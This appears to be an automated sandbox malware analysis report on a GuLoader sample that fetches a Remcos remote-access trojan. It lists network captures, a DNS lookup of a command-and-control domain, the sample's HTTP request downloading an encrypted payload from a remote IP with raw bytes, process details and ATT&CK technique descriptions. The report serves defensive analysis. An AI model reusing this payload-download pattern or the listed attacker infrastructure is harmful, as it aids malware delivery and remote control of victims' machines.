Aug 2, 2021 15:17:47.466440916 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466463089 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466510057 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466531038 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466553926 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466576099 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466625929 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466671944 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466692924 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466715097 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466736078 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466757059 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466798067 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466814041 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.466820002 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466846943 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466870070 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466912985 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466962099 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.466984034 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467005014 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467030048 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467039108 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467081070 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467103004 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467133999 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467169046 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467180967 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467226982 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467247963 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467257023 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467293978 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467317104 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.467318058 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.467403889 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.520016909 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520051956 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520076990 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520100117 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520123005 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520144939 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520170927 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520195007 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520216942 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520240068 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520262957 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520283937 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520308018 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520329952 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520355940 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520379066 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.520397902 CEST	80	49758	101.99.94.119	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 15:15:48.615036011 CEST	49714	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:48.642694950 CEST	53	49714	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:49.469579935 CEST	58028	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:49.506714106 CEST	53	58028	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:49.614150047 CEST	53097	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:49.638915062 CEST	53	53097	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:50.817020893 CEST	49257	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:50.852533102 CEST	53	49257	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:51.977631092 CEST	62389	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:52.003667116 CEST	53	62389	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:53.560806990 CEST	49910	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:53.585360050 CEST	53	49910	8.8.8.8	192.168.2.4
Aug 2, 2021 15:15:54.237910032 CEST	55854	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:15:54.273222923 CEST	53	55854	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:00.731826067 CEST	64549	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:00.760391951 CEST	53	64549	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:01.466253996 CEST	63153	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:01.494025946 CEST	53	63153	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:02.502438068 CEST	52991	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:02.530064106 CEST	53	52991	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:05.477528095 CEST	53700	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:05.503992081 CEST	53	53700	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:06.188730001 CEST	51726	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:06.213670015 CEST	53	51726	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:07.164069891 CEST	56794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:07.191531897 CEST	53	56794	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:08.279195070 CEST	56534	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:08.307786942 CEST	53	56534	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:09.184331894 CEST	56627	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:09.209460020 CEST	53	56627	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:14.136224031 CEST	53157	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:14.163957119 CEST	53	53157	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:15.007100105 CEST	56621	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:15.039376974 CEST	53	56621	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:16.033565044 CEST	63116	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:16.060931921 CEST	53	63116	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:18.747334957 CEST	64078	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:18.774888039 CEST	53	64078	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:21.603003025 CEST	64801	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:21.644934893 CEST	53	64801	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:41.079384089 CEST	61721	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:41.116955996 CEST	53	61721	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:47.369030952 CEST	51255	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:47.409276009 CEST	53	51255	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:48.311381102 CEST	61522	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:48.449517012 CEST	53	61522	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:49.167481899 CEST	52337	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:49.195369959 CEST	53	52337	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:49.488337994 CEST	55046	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:49.522317886 CEST	53	55046	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:49.966597080 CEST	49612	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.001882076 CEST	53	49612	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:50.460689068 CEST	49285	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.494363070 CEST	53	49285	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:50.686021090 CEST	50601	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.726197958 CEST	53	50601	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:50.950455904 CEST	60875	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:50.983105898 CEST	53	60875	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:51.757920027 CEST	56448	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:51.782411098 CEST	53	56448	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:52.497798920 CEST	59172	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:52.534377098 CEST	53	59172	8.8.8.8	192.168.2.4
Aug 2, 2021 15:16:53.086787939 CEST	62420	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:16:53.119651079 CEST	53	62420	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:10.970607996 CEST	60579	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:11.005824089 CEST	53	60579	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:15.650224924 CEST	50183	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:15.685762882 CEST	53	50183	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:19.217799902 CEST	61531	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:19.263786077 CEST	53	61531	8.8.8.8	192.168.2.4
Aug 2, 2021 15:17:48.299998045 CEST	49228	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:17:48.334119081 CEST	53	49228	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:41.980040073 CEST	59794	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:42.004930019 CEST	53	59794	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:42.479918957 CEST	55916	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:42.524019957 CEST	53	55916	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:46.058964968 CEST	52752	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:46.099714041 CEST	53	52752	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:50.367840052 CEST	60542	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:50.417256117 CEST	53	60542	8.8.8.8	192.168.2.4
Aug 2, 2021 15:20:51.634783030 CEST	60689	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:20:51.690402985 CEST	53	60689	8.8.8.8	192.168.2.4
Aug 2, 2021 15:22:49.935353041 CEST	64206	53	192.168.2.4	8.8.8.8
Aug 2, 2021 15:22:49.975924969 CEST	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 2, 2021 15:17:48.299998045 CEST	192.168.2.4	8.8.8.8	0xe5e6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 2, 2021 15:16:14.163957119 CEST	8.8.8.8	192.168.2.4	0x52b2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Aug 2, 2021 15:17:48.334119081 CEST	8.8.8.8	192.168.2.4	0xe5e6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 2, 2021 15:20:42.004930019 CEST	8.8.8.8	192.168.2.4	0x2953	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49758	101.99.94.119	80	C:\Users\user\Desktop\kGSHiWbgq9.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 15:17:47.258838892 CEST	8762	OUT	GET /WEALTH_PRUuqVZw139.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 2, 2021 15:17:47.311050892 CEST	8763	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 05:17:46 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT ETag: "72840-5c886c5bd2c84" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38 Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:LHC[kn,OY\|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1LtCvkytbz3a$q10`]kcp]z$_U]Xl8yeq~&r)B<XJ),RxBa\|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'GHR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K\|X&U/0)\|$"YngZp$TO\|85UY#g"s@OafKhK'<\|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: kGSHiWbgq9.exe PID: 6592 Parent PID: 5872

General

Start time:	15:15:53
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\kGSHiWbgq9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	27BF14807BC9D5CD2D823293F43C3A3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: kGSHiWbgq9.exe PID: 6636 Parent PID: 6592

General

Start time:	15:16:52
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\kGSHiWbgq9.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\kGSHiWbgq9.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	27BF14807BC9D5CD2D823293F43C3A3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics